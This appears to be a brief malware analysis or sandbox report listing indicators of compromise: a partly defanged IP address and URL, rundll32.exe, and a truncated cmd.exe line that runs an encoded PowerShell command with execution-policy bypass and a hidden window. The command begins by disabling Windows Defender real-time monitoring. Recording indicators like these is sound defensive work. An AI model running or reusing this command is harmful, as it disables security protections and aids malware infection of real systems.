Technical Information
- http://83.#7.20.81/meta
- <SYSTEM32>\rundll32.exe
- '83.#7.20.81':80
- http://83.#7.20.81/meta
- '<SYSTEM32>\rundll32.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -exec bypass -w 1 -e dAByAHkAIAB7ACAAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA7ACAAcwB0AG...